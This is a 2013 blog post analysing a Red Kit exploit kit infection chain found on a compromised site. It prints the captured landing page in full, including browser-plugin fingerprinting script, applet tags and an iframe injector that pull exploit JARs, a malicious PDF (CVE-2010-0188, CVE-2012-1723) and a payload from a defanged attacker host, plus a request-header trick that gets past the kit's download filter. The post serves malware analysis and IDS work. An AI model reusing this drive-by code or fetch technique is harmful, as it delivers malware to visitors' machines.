Sunday, March 10, 2013

Analyzing Red Kit Exploit Kit made easy


Having covered the Blackhole Exploit Kit lately, I thought it would be a great idea to look more into the Red Kit EK.

A good starting point for malicious URLs, as always, is urlquery.net or malwaredomainlist.com.

Today's pick was urlquery: some poor Madonna fans having a bad day!

I just looked into the output and immediately found two iframes that caught my attention:

hxxp: //miamiheattickets.com/http.php
hxxp: //tucsonaccidentattorney.net/mhed.html?j=449177


0. Fetch the web pages


The second page looks especially interesting, as it has the distinct pattern of an RK URL.

--2013-03-10 19:48:19--  hxxp: //miamiheattickets.com/http.php
Resolving miamiheattickets.com... 174.120.81.158
Connecting to miamiheattickets.com|174.120.81.158|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 404 Not Found
  Date: Sun, 10 Mar 2013 18:49:15 GMT
  Server: Apache
  Last-Modified: Tue, 10 Apr 2012 05:19:44 GMT
  Accept-Ranges: bytes
  Content-Length: 3354
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
2013-03-10 19:48:21 ERROR 404: Not Found.

--2013-03-10 19:49:28--  hxxp: //tucsonaccidentattorney.net/mhed.html?j=449177
Resolving tucsonaccidentattorney.net... 67.18.140.14
Connecting to tucsonaccidentattorney.net|67.18.140.14|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 301 Moved Permanently
  Date: Sun, 10 Mar 2013 18:50:24 GMT
  Server: Apache
  Location: hxxp: //fgccnc.org/mhed.htm?j=449177
  Content-Length: 0
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
Location: hxxp: //fgccnc.org/mhed.htm?j=449177 [following]
--2013-03-10 19:49:30--  hxxp: //fgccnc.org/mhed.htm?j=449177
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 18:50:26 GMT
  Server: Apache
  Content-Length: 12956
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
Length: 12956 (13K) [text/html]
Saving to: `pane2.html'

     0K .......... ..                                         100%  205M=0s

2013-03-10 19:49:33 (205 MB/s) - `pane2.html' saved [12956/12956]


Excellent :) I got a hit on the second page.

1. Plugin Detect ver 0.7.7


<html>
    <script>
        var dtYWu = {
            version: "0.7.7",
            rDate: "04/11/2012",
            name: "diction",
            handler: function (c, b, a) {
                return function () {
                    c(b, a)
                }
            },
            isDefined: function (b) {
                return typeof b != "undefined"
            },
            isArray: function (b) {
                return (/array/i).test(Object.prototype.toString.call(b))
            },
            isFunc: function (b) {
                return typeof b == "function"
            },
            isString: function (b) {
                return typeof b == "string"
            },
            isNum: function (b) {
                return typeof b == "number"
            },
            isStrNum: function (b) {
                return (typeof b == "string" && (/\d/).test(b))
            },
            getNumRegx: /[\d][\d\.\_,-]*/,
            splitNumRegx: /[\.\_,-]/g,
            getNum: function (b, c) {
                var d = this,
                    a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
                return a ? a[0] : null
            },
            compareNums: function (h, f, d) {
                var e = this,
                    c, b, a, g = parseInt;
                if (e.isStrNum(h) && e.isStrNum(f)) {
                    if (e.isDefined(d) && d.compareNums) {
                        return d.compareNums(h, f)
                    }
                    c = h.split(e.splitNumRegx);
                    b = f.split(e.splitNumRegx);
                    for (a = 0; a < Math.min(c.length, b.length); a++) {
                        if (g(c[a], 10) > g(b[a], 10)) {
                            return 1
                        }
                        if (g(c[a], 10) < g(b[a], 10)) {
                            return -1
                        }
                    }
                }
                return 0
            },
            formatNum: function (b, c) {
                var d = this,
                    a, e;
                if (!d.isStrNum(b)) {
                    return null
                }
                if (!d.isNum(c)) {
                    c = 4
                }
                c--;
                e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
                for (a = 0; a < 4; a++) {
                    if (/^(0+)(.+)$/.test(e[a])) {
                        e[a] = RegExp.$2
                    }
                    if (a > c || !(/\d/).test(e[a])) {
                        e[a] = "0"
                    }
                }
                return e.slice(0, 4).join(",")
            },
            $$hasMimeType: function (a) {
                return function (c) {
                    if (!a.isIE && c) {
                        var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
                        for (b = 0; b < d.length; b++) {
                            if (a.isString(d[b]) && /[^\s]/.test(d[b])) {
                                f = navigator.mimeTypes[d[b]];
                                e = f ? f.enabledPlugin : 0;
                                if (e && (e.name || e.description)) {
                                    return f
                                }
                            }
                        }
                    }
                    return null
                }
            },
            findNavPlugin: function (l, e, c) {
                var j = this,
                    h = new RegExp(l, "i"),
                    d = (!j.isDefined(e) || e) ? /\d/ : 0,
                    k = c ? new RegExp(c, "i") : 0,
                    a = navigator.plugins,
                    g = "",
                    f, b, m;
                for (f = 0; f < a.length; f++) {
                    m = a[f].description || g;
                    b = a[f].name || g;
                    if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
                        if (!k || !(k.test(m) || k.test(b))) {
                            return a[f]
                        }
                    }
                }
                return null
            },
            getMimeEnabledPlugin: function (k, m, c) {
                var e = this,
                    f, b = new RegExp(m, "i"),
                    h = "",
                    g = c ? new RegExp(c, "i") : 0,
                    a, l, d, j = e.isString(k) ? [k] : k;
                for (d = 0; d < j.length; d++) {
                    if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
                        l = f.description || h;
                        a = f.name || h;
                        if (b.test(l) || b.test(a)) {
                            if (!g || !(g.test(l) || g.test(a))) {
                                return f
                            }
                        }
                    }
                }
                return 0
            },
            getPluginFileVersion: function (f, b) {
                var h = this,
                    e, d, g, a, c = -1;
                if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
                    return b
                }
                if (!b) {
                    return e
                }
                e = h.formatNum(e);
                b = h.formatNum(b);
                d = b.split(h.splitNumRegx);
                g = e.split(h.splitNumRegx);
                for (a = 0; a < d.length; a++) {
                    if (c > -1 && a > c && d[a] != "0") {
                        return b
                    }
                    if (g[a] != d[a]) {
                        if (c == -1) {
                            c = a
                        }
                        if (d[a] != "0") {
                            return b
                        }
                    }
                }
                return e
            },
            AXO: window.ActiveXObject,
            getAXO: function (a) {
                var f = null,
                    d, b = this,
                    c = {};
                try {
                    f = new b.AXO(a)
                } catch (d) {}
                return f
            },
            convertFuncs: function (f) {
                var a, g, d, b = /^[$][$]/,
                    c = this;
                for (a in f) {
                    if (b.test(a)) {
                        try {
                            g = a.slice(2);
                            if (g.length > 0 && !f[g]) {
                                f[g] = f[a](f);
                                delete f[a]
                            }
                        } catch (d) {}
                    }
                }
            },
            initObj: function (e, b, d) {
                var a, c;
                if (e) {
                    if (e[b[0]] == 1 || d) {
                        for (a = 0; a < b.length; a = a + 2) {
                            e[b[a]] = b[a + 1]
                        }
                    }
                    for (a in e) {
                        c = e[a];
                        if (c && c[b[0]] == 1) {
                            this.initObj(c, b)
                        }
                    }
                }
            },
            initScript: function () {
                var c = this,
                    a = navigator,
                    e = "/",
                    f, i = a.userAgent || "",
                    g = a.vendor || "",
                    b = a.platform || "",
                    h = a.product || "";
                c.initObj(c, ["$", c]);
                for (f in c.Plugins) {
                    if (c.Plugins[f]) {
                        c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
                    }
                };
                c.OS = 100;
                if (b) {
                    var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "", 100];
                    for (f = d.length - 2; f >= 0; f = f - 2) {
                        if (d[f] && new RegExp(d[f], "i").test(b)) {
                            c.OS = d[f + 1];
                            break
                        }
                    }
                }
                c.convertFuncs(c);
                c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
                c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
                c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
                c.ActiveXEnabled = false;
                if (c.isIE) {
                    var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
                    for (f = 0; f < j.length; f++) {
                        if (c.getAXO(j[f])) {
                            c.ActiveXEnabled = true;
                            break
                        }
                    }
                }
                c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
                c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
                c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
                c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
                c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
                c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
                c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
                c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
                c.addWinEvent("load", c.handler(c.runWLfuncs, c))
            },
            init: function (d) {
                var c = this,
                    b, d, a = {
                        status: -3,
                        plugin: 0
                    };
                if (!c.isString(d)) {
                    return a
                }
                if (d.length == 1) {
                    c.getVersionDelimiter = d;
                    return a
                }
                d = d.toLowerCase().replace(/\s/g, "");
                b = c.Plugins[d];
                if (!b || !b.getVersion) {
                    return a
                }
                a.plugin = b;
                if (!c.isDefined(b.installed)) {
                    b.installed = null;
                    b.version = null;
                    b.version0 = null;
                    b.getVersionDone = null;
                    b.pluginName = d
                }
                c.garbage = false;
                if (c.isIE && !c.ActiveXEnabled && d !== "java") {
                    a.status = -2;
                    return a
                }
                a.status = 1;
                return a
            },
            fPush: function (b, a) {
                var c = this;
                if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
                    a.push(b)
                }
            },
            callArray: function (b) {
                var c = this,
                    a;
                if (c.isArray(b)) {
                    for (a = 0; a < b.length; a++) {
                        if (b[a] === null) {
                            return
                        }
                        c.call(b[a]);
                        b[a] = null
                    }
                }
            },
            call: function (c) {
                var b = this,
                    a = b.isArray(c) ? c.length : -1;
                if (a > 0 && b.isFunc(c[0])) {
                    c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
                } else {
                    if (b.isFunc(c)) {
                        c(b)
                    }
                }
            },
            getVersionDelimiter: ",",
            $$getVersion: function (a) {
                return function (g, d, c) {
                    var e = a.init(g),
                        f, b, h = {};
                    if (e.status < 0) {
                        return null
                    };
                    f = e.plugin;
                    if (f.getVersionDone != 1) {
                        f.getVersion(null, d, c);
                        if (f.getVersionDone === null) {
                            f.getVersionDone = 1
                        }
                    }
                    a.cleanup();
                    b = (f.version || f.version0);
                    b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
                    return b
                }
            },
            cleanup: function () {},
            addWinEvent: function (d, c) {
                var e = this,
                    a = window,
                    b;
                if (e.isFunc(c)) {
                    if (a.addEventListener) {
                        a.addEventListener(d, c, false)
                    } else {
                        if (a.attachEvent) {
                            a.attachEvent("on" + d, c)
                        } else {
                            b = a["on" + d];
                            a["on" + d] = e.winHandler(c, b)
                        }
                    }
                }
            },
            winHandler: function (d, c) {
                return function () {
                    d();
                    if (typeof c == "function") {
                        c()
                    }
                }
            },
            WLfuncs0: [],
            WLfuncs: [],
            runWLfuncs: function (a) {
                var b = {};
                a.winLoaded = true;
                a.callArray(a.WLfuncs0);
                a.callArray(a.WLfuncs);
                if (a.onDoneEmptyDiv) {
                    a.onDoneEmptyDiv()
                }
            },
            winLoaded: false,
            $$onWindowLoaded: function (a) {
                return function (b) {
                    if (a.winLoaded) {
                        a.call(b)
                    } else {
                        a.fPush(b, a.WLfuncs)
                    }
                }
            },
            div: null,
            divID: "plugindetect",
            divWidth: 50,
            pluginSize: 1,
            emptyDiv: function () {
                var d = this,
                    b, h, c, a, f, g;
                if (d.div && d.div.childNodes) {
                    for (b = d.div.childNodes.length - 1; b >= 0; b--) {
                        c = d.div.childNodes[b];
                        if (c && c.childNodes) {
                            for (h = c.childNodes.length - 1; h >= 0; h--) {
                                g = c.childNodes[h];
                                try {
                                    c.removeChild(g)
                                } catch (f) {}
                            }
                        }
                        if (c) {
                            try {
                                d.div.removeChild(c)
                            } catch (f) {}
                        }
                    }
                }
                if (!d.div) {
                    a = document.getElementById(d.divID);
                    if (a) {
                        d.div = a
                    }
                }
                if (d.div && d.div.parentNode) {
                    try {
                        d.div.parentNode.removeChild(d.div)
                    } catch (f) {}
                    d.div = null
                }
            },
            DONEfuncs: [],
            onDoneEmptyDiv: function () {
                var c = this,
                    a, b;
                if (!c.winLoaded) {
                    return
                }
                if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
                    return
                }
                for (a in c) {
                    b = c[a];
                    if (b && b.funcs) {
                        if (b.OTF == 3) {
                            return
                        }
                        if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
                            return
                        }
                    }
                }
                for (a = 0; a < c.DONEfuncs.length; a++) {
                    c.callArray(c.DONEfuncs)
                }
                c.emptyDiv()
            },
            getWidth: function (c) {
                if (c) {
                    var a = c.scrollWidth || c.offsetWidth,
                        b = this;
                    if (b.isNum(a)) {
                        return a
                    }
                }
                return -1
            },
            getTagStatus: function (m, g, a, b) {
                var c = this,
                    f, k = m.span,
                    l = c.getWidth(k),
                    h = a.span,
                    j = c.getWidth(h),
                    d = g.span,
                    i = c.getWidth(d);
                if (!k || !h || !d || !c.getDOMobj(m)) {
                    return -2
                }
                if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
                    return 0
                }
                if (l >= i) {
                    return -1
                }
                try {
                    if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
                        if (!m.winLoaded && c.winLoaded) {
                            return 1
                        }
                        if (m.winLoaded && c.isNum(b)) {
                            if (!c.isNum(m.count)) {
                                m.count = b
                            }
                            if (b - m.count >= 10) {
                                return 1
                            }
                        }
                    }
                } catch (f) {}
                return 0
            },
            getDOMobj: function (g, a) {
                var f, d = this,
                    c = g ? g.span : 0,
                    b = c && c.firstChild ? 1 : 0;
                try {
                    if (b && a) {
                        d.div.focus()
                    }
                } catch (f) {}
                return b ? c.firstChild : null
            },
            setStyle: function (b, g) {
                var f = b.style,
                    a, d, c = this;
                if (f && g) {
                    for (a = 0; a < g.length; a = a + 2) {
                        try {
                            f[g[a]] = g[a + 1]
                        } catch (d) {}
                    }
                }
            },
            insertDivInBody: function (a, i) {
                var h, f = this,
                    b = "pd33993399",
                    d = null,
                    j = i ? window.top.document : window.document,
                    c = "<",
                    g = (j.getElementsByTagName("body")[0] || j.body);
                if (!g) {
                    try {
                        j.write(c + 'div id="' + b + '">o' + c + "/div>");
                        d = j.getElementById(b)
                    } catch (h) {}
                }
                g = (j.getElementsByTagName("body")[0] || j.body);
                if (g) {
                    if (g.firstChild && f.isDefined(g.insertBefore)) {
                        g.insertBefore(a, g.firstChild)
                    } else {
                        g.appendChild(a)
                    }
                    if (d) {
                        g.removeChild(d)
                    }
                } else {}
            },
            insertHTML: function (g, b, h, a, l) {
                var m, n = document,
                    k = this,
                    q, p = n.createElement("span"),
                    o, j, f = "<";
                var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
                var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
                if (!k.isDefined(a)) {
                    a = ""
                }
                if (k.isString(g) && (/[^\s]/).test(g)) {
                    g = g.toLowerCase().replace(/\s/g, "");
                    q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
                    q += 'style="' + i + 'display:inline;" ';
                    for (o = 0; o < b.length; o = o + 2) {
                        if (/[^\s]/.test(b[o + 1])) {
                            q += b[o] + '="' + b[o + 1] + '" '
                        }
                    }
                    q += ">";
                    for (o = 0; o < h.length; o = o + 2) {
                        if (/[^\s]/.test(h[o + 1])) {
                            q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
                        }
                    }
                    q += a + f + "/" + g + ">"
                } else {
                    q = a
                }
                if (!k.div) {
                    j = n.getElementById(k.divID);
                    if (j) {
                        k.div = j
                    } else {
                        k.div = n.createElement("div");
                        k.div.id = k.divID
                    }
                    k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
                    if (!j) {
                        k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
                        k.insertDivInBody(k.div)
                    }
                }
                if (k.div && k.div.parentNode) {
                    k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
                    try {
                        p.innerHTML = q
                    } catch (m) {};
                    try {
                        k.div.appendChild(p)
                    } catch (m) {};
                    return {
                        span: p,
                        winLoaded: k.winLoaded,
                        tagName: g,
                        outerHTML: q
                    }
                }
                return {
                    span: null,
                    winLoaded: k.winLoaded,
                    tagName: "",
                    outerHTML: q
                }
            },
            Plugins: {
                adobereader: {
                    mimeType: "application/pdf",
                    navPluginObj: null,
                    progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
                    classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
                    INSTALLED: {},
                    pluginHasMimeType: function (d, c, f) {
                        var b = this,
                            e = b.$,
                            a;
                        for (a in d) {
                            if (d[a] && d[a].type && d[a].type == c) {
                                return 1
                            }
                        }
                        if (e.getMimeEnabledPlugin(c, f)) {
                            return 1
                        }
                        return 0
                    },
                    getVersion: function (l, j) {
                        var g = this,
                            d = g.$,
                            i, f, m, n, b = null,
                            h = null,
                            k = g.mimeType,
                            a, c;
                        if (d.isString(j)) {
                            j = j.replace(/\s/g, "");
                            if (j) {
                                k = j
                            }
                        } else {
                            j = null
                        }
                        if (d.isDefined(g.INSTALLED[k])) {
                            g.installed = g.INSTALLED[k];
                            return
                        }
                        if (!d.isIE) {
                            a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
                            if (g.getVersionDone !== 0) {
                                g.getVersionDone = 0;
                                b = d.getMimeEnabledPlugin(g.mimeType, a);
                                if (!j) {
                                    n = b
                                }
                                if (!b && d.hasMimeType(g.mimeType)) {
                                    b = d.findNavPlugin(a, 0)
                                }
                                if (b) {
                                    g.navPluginObj = b;
                                    h = d.getNum(b.description) || d.getNum(b.name);
                                    h = d.getPluginFileVersion(b, h);
                                    if (!h && d.OS == 1) {
                                        if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
                                            h = "9"
                                        } else {
                                            if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
                                                h = "8"
                                            }
                                        }
                                    }
                                }
                            } else {
                                h = g.version
                            }
                            if (!d.isDefined(n)) {
                                n = d.getMimeEnabledPlugin(k, a)
                            }
                            g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
                        } else {
                            b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
                            c = /=\s*([\d\.]+)/g;
                            try {
                                f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
                                for (m = 0; m < 5; m++) {
                                    if (c.test(f) && (!h || RegExp.$1 > h)) {
                                        h = RegExp.$1
                                    }
                                }
                            } catch (i) {}
                            g.installed = h ? 1 : (b ? 0 : -1)
                        }
                        if (!g.version) {
                            g.version = d.formatNum(h)
                        }
                        g.INSTALLED[k] = g.installed
                    }
                },
                zz: 0
            }
        };
    </script>
    
    <body>
        <script>
            document.write('<applet archive="hxxp: //fgccnc.org/332.j&#97;r" code="Vlast.class"><param name="elitken" value="l16r3o5uvme2r3o5uvtcwr3o5uvhair3o5uv.ecr3o5uv3hyr3o5uv3vcr3o5uv/gar3o5uvgo2r3o5uvrabr3o5uvoqkr3o5uv.dar3o5uvch3r3o5uvncrr3o5uvchkr3o5uvch9r3o5uvg3tr3o5uvf14r3o5uv/q9r3o5uv/brr3o5uv:rer3o5uvpovr3o5uvtzrr3o5uvtalr3o5uvhlzr3o5uv"></applet>');
            document.write('<applet archive="hxxp: //fgccnc.org/887.j&#97;r" code="Vlast.class"><param name="elitken" value="l80r3o5uvm16r3o5uvtm6r3o5uvhrcr3o5uv.mcr3o5uv1gwr3o5uv4zlr3o5uv/kwr3o5uvgvar3o5uvr1wr3o5uvo2or3o5uv.56r3o5uvcidr3o5uvn3yr3o5uvccvr3o5uvcsar3o5uvgm4r3o5uvfpgr3o5uv/tor3o5uv/61r3o5uv:o4r3o5uvpkcr3o5uvt1gr3o5uvt59r3o5uvhhmr3o5uv"></applet>');
        </script>
        <script type="text/javascript">
            var biiz = "s" + "r" + "c";
            var makral = false;


            function tksmke() {
                otrtorol.setAttribute("width", 25);
                otrtorol.setAttribute("height", 22);
                document.body.appendChild(otrtorol);
                otrtorol.setAttribute(biiz, "hxxp: //fgccnc.org/987.pdf");
            }

            function etract(a, b) {
                if ((a == 8 && b < 4) || (a == 9 && b < 4)) makral = true;
            }

            var otrtorol = document.createElement("ifra" + "me");

            dtYWu.initScript();


            function ygutiy(lite, arwtawt) {
                if (arwtawt) {
                    arwtawt = arwtawt.split(',');
                    etract(arwtawt[0], arwtawt[1]);
                }
            }

            ygutiy(1, dtYWu.getVersion("AdobeReader"));
            while (makral) {
                tksmke();
                makral = false;
            }
        </script>
    </body>

</html>
The most interesting parts are the links to the exploit files:

            document.write('<applet archive="hxxp: //fgccnc.org/332.j&#97;r" code="Vlast.class"><param name="elitken" value="l16r3o5uvme2r3o5uvtcwr3o5uvhair3o5uv.ecr3o5uv3hyr3o5uv3vcr3o5uv/gar3o5uvgo2r3o5uvrabr3o5uvoqkr3o5uv.dar3o5uvch3r3o5uvncrr3o5uvchkr3o5uvch9r3o5uvg3tr3o5uvf14r3o5uv/q9r3o5uv/brr3o5uv:rer3o5uvpovr3o5uvtzrr3o5uvtalr3o5uvhlzr3o5uv"></applet>');
            document.write('<applet archive="hxxp: //fgccnc.org/887.j&#97;r" code="Vlast.class"><param name="elitken" value="l80r3o5uvm16r3o5uvtm6r3o5uvhrcr3o5uv.mcr3o5uv1gwr3o5uv4zlr3o5uv/kwr3o5uvgvar3o5uvr1wr3o5uvo2or3o5uv.56r3o5uvcidr3o5uvn3yr3o5uvccvr3o5uvcsar3o5uvgm4r3o5uvfpgr3o5uv/tor3o5uv/61r3o5uv:o4r3o5uvpkcr3o5uvt1gr3o5uvt59r3o5uvhhmr3o5uv"></applet>');
        </script>
        <script type="text/javascript">
            var biiz = "s" + "r" + "c";
            var makral = false;

            function tksmke() {
                otrtorol.setAttribute("width", 25);
                otrtorol.setAttribute("height", 22);
                document.body.appendChild(otrtorol);
                otrtorol.setAttribute(biiz, "hxxp: //fgccnc.org/987.pdf");
            }

Two JARs and one PDF: 332.jar, 887.jar and 987.pdf. Note that the archive URLs spell the extension as j&#97;r (&#97; is the HTML entity for "a"), so a naive search for ".jar" in the page source finds nothing.

2. Fetch the exploit files - NOT


--2013-03-10 19:57:03--  hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 404 Not Found
  Date: Sun, 10 Mar 2013 18:57:57 GMT
  Server: Apache
  Content-Length: 0
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
2013-03-10 19:57:05 ERROR 404: Not Found.

--2013-03-10 19:58:32--  hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 404 Not Found
  Date: Sun, 10 Mar 2013 18:59:26 GMT
  Server: Apache
  Content-Length: 0
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
2013-03-10 19:58:34 ERROR 404: Not Found.

--2013-03-10 19:58:53--  hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 404 Not Found
  Date: Sun, 10 Mar 2013 18:59:47 GMT
  Server: Apache
  Content-Length: 0
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
2013-03-10 19:58:56 ERROR 404: Not Found.


Nope! 404s all over my screen. Not so easy to pick this low-hanging fruit after all...
Fortunately my Google fu is with me and I found a great hint over at the day by day blog.

3. Header FU

Add these headers to the request:
content-type: application/x-java-archive
Accept: text/html, image/gif, *; q=.2, */*; q=.2

That would have taken me ages to figure out, but now I'm happy.


4. Fetch the exploit files - for real


--2013-03-10 20:02:13--  hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 19:03:08 GMT
  Server: Apache
  Content-Disposition: inline; filename=e55de572.jar
  Content-Length: 13798
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/java-archive
Length: 13798 (13K) [application/java-archive]
Saving to: `332.jar'

     0K .......... ...                                        100% 2.65M=0.005s

2013-03-10 20:02:15 (2.65 MB/s) - `332.jar' saved [13798/13798]

--2013-03-10 20:03:30--  hxxp: //fgccnc.org/887.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 19:04:25 GMT
  Server: Apache
  Content-Disposition: inline; filename=31d64b95.jar
  Content-Length: 13731
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/java-archive
Length: 13731 (13K) [application/java-archive]
Saving to: `887.jar'

     0K .......... ...                                        100% 4.37M=0.003s

2013-03-10 20:03:32 (4.37 MB/s) - `887.jar' saved [13731/13731]

--2013-03-10 20:04:26--  hxxp: //fgccnc.org/987.pdf
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 19:05:20 GMT
  Server: Apache
  Content-Disposition: inline; filename=bb43a521.pdf
  Content-Length: 5531
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/pdf
Length: 5531 (5.4K) [application/pdf]
Saving to: `987.pdf'

     0K .....                                                 100%  113M=0s

2013-03-10 20:04:28 (113 MB/s) - `987.pdf' saved [5531/5531]


Excellent. The files are downloaded. Time for a quick analysis:

5. Quick analysis


Let's figure out what the bad guys wanted to send us and what payload they really wanted to hand over to the poor Madonna fans.

332.jar
MD5: 913f1d801abd70a483888ea20aad3a73
Virustotal: 5/45 https://www.virustotal.com/en/file/08759205ed8a2030e659e2ee843c56d13fadd18cdb1a5e1a077bd4e8422dd035/analysis/1362953517/
CVE-2012-1723

887.jar
MD5: 60de68f7919603650a50633f82da7c9b
Virustotal: 6/45 https://www.virustotal.com/en/file/912991ab959148febe90297815dd3025507bad10ffebe7555dfddf7708dd6566/analysis/1362953559/

987.pdf
MD5: 67c5a657b54cf4dc9cae74bfb763a285
Virustotal: 2/45 https://www.virustotal.com/en/file/7be4238988221318f2ca6c41419fd452d892d0af62efa9834d55411900ecfbc3/analysis/1362953625/
WepaWet: Malicious http://wepawet.iseclab.org/view.php?hash=67c5a657b54cf4dc9cae74bfb763a285&type=js
CVE-2010-0188


As wepawet is kind enough to give us the URL to the EXE:

6. Fetching the final payload


--2013-03-10 20:08:26--  hxxp: //fgccnc.org/62.html
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 19:09:21 GMT
  Server: Apache
  Expires: Mon, 20 Aug 2002 02:00:00 GMT
  Pragma: no-cache
  Cache-Control: no-cache
  Content-Transfer-Encoding: binary
  Content-Disposition: inline; filename=setup.exe
  Content-Length: 32128
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/octet-stream
Length: 32128 (31K) [application/octet-stream]
Saving to: `62.exe'

     0K .......... .......... .......... .                    100% 51.3K=0.6s
2013-03-10 20:08:29 (51.3 KB/s) - `62.exe' saved [32128/32128]


62.exe AKA setup.exe
MD5: 5b7c57fb83f0e47821b97fb93f055716
Virustotal: 0/45

Hmmmf; 0/45 @ VT and no MZ at the start of the file. Need to look more into this...

7. IDS signatures


As a side step, writing IDS signatures for calls to 332.jar, 887.jar, 987.pdf and 62.html, for the returned setup.exe, and for the URL pattern [a-z][a-z][a-z][a-z]\.html\?.=[0-9][0-9][0-9][0-9][0-9][0-9] should give you better sleep at night if you work with intrusion detection and prevention.
